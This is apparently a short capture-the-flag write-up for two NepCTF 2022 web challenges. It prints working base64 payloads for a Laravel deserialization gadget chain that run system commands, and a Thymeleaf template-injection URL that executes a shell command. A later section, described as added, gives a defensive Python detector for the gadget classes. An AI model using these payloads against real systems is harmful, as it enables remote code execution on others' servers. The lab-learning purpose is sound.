Because I had other things to do, I was only online for a short while, solved two warm-up challenges and then left.
Web
Just Kidding
Reference: https://xz.aliyun.com/t/11362, the first chain.
Comparing against the key points there, they all match:
\vendor\laravel\framework\src\Illuminate\Broadcasting\PendingBroadcast.php
![This is an image](/2022/07/20/NepCTF-2022-WP/image1.png)
\vendor\laravel\framework\src\Illuminate\Bus\Dispatcher.php
![This is an image](/2022/07/20/NepCTF-2022-WP/image2.png)
![This is an image](/2022/07/20/NepCTF-2022-WP/image3.png)
It can be exploited directly; the PoC is as follows:

```php
<?php
```
```
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo0OiJscyAvIjt9fQ==
```
![This is an image](/2022/07/20/NepCTF-2022-WP/image4.jpg)
```
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo5OiJjYXQgL2ZsYWciO319
```
![This is an image](/2022/07/20/NepCTF-2022-WP/image5.jpg)
flag: NepCTF{c2edd745-b451-4b64-a37e-bdd1942d5a7c}
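
As an added example (not part of the original write-up and not Laravel code), the following Python sketch shows a defensive check for this kind of input: it decodes a request parameter and lists the PHP object classes it declares, flagging the two classes named above. The function names, the blocking policy and the sample values are assumptions constructed for illustration.

```python
import base64
import re

# Gadget classes named in this write-up's chain (Laravel framework classes).
GADGET_CLASSES = {
    "Illuminate\\Broadcasting\\PendingBroadcast",
    "Illuminate\\Bus\\Dispatcher",
}

# PHP serialize() encodes an object as O:<name length>:"<class name>":<property count>:{
OBJECT_HEADER = re.compile(rb'O:(\d+):"([^"]+)":\d+:\{')


def serialized_classes(raw: bytes) -> list[str]:
    """Return the class name of every object header found in PHP-serialized bytes."""
    names = []
    for match in OBJECT_HEADER.finditer(raw):
        declared_len, name = int(match.group(1)), match.group(2)
        if declared_len == len(name):  # unserialize() rejects a wrong length prefix
            names.append(name.decode("ascii", "replace"))
    return names


def inspect_parameter(value: str) -> dict:
    """Decode a request parameter (base64 or raw) and report the object classes it carries."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:  # not base64: treat the value as raw serialized text
        raw = value.encode()
    classes = serialized_classes(raw)
    return {
        "classes": classes,
        "gadget_hit": sorted(set(classes) & GADGET_CLASSES),
        "block": bool(classes),  # assumed policy: user input should carry no objects at all
    }


def php_object(cls: str, body: str = "", props: int = 0) -> str:
    """Build a harmless object header for the constructed samples below."""
    return f'O:{len(cls)}:"{cls}":{props}:{{{body}}}'


# Constructed samples: the objects hold no callable or command, so they are not a usable chain.
inner = php_object("Illuminate\\Bus\\Dispatcher")
nested = php_object("Illuminate\\Broadcasting\\PendingBroadcast", f's:6:"events";{inner}', 1)
SAMPLE_OBJECT = base64.b64encode(nested.encode()).decode()
SAMPLE_PLAIN = base64.b64encode(b'a:1:{s:4:"page";i:2;}').decode()
```

On the PHP side, the matching fix is to stop passing request data to `unserialize()`, or to call it with `['allowed_classes' => false]` so no object is instantiated.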
Challenger
Java Thymeleaf template injection; it can be exploited directly.
![This is an image](/2022/07/20/NepCTF-2022-WP/image6.png)
The payload is as follows:

```
/eval?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat%20flag%22).getInputStream()).next()%7d__::.x
```
![This is an image](/2022/07/20/NepCTF-2022-WP/image7.png)
flag: NepCTF{c2edd745-b451-4b64-a37e-bdd1942d5a7c}
Some related learning links
Java Security: Thymeleaf Template Injection Analysis https://www.cnblogs.com/nice0e3/p/16212784.html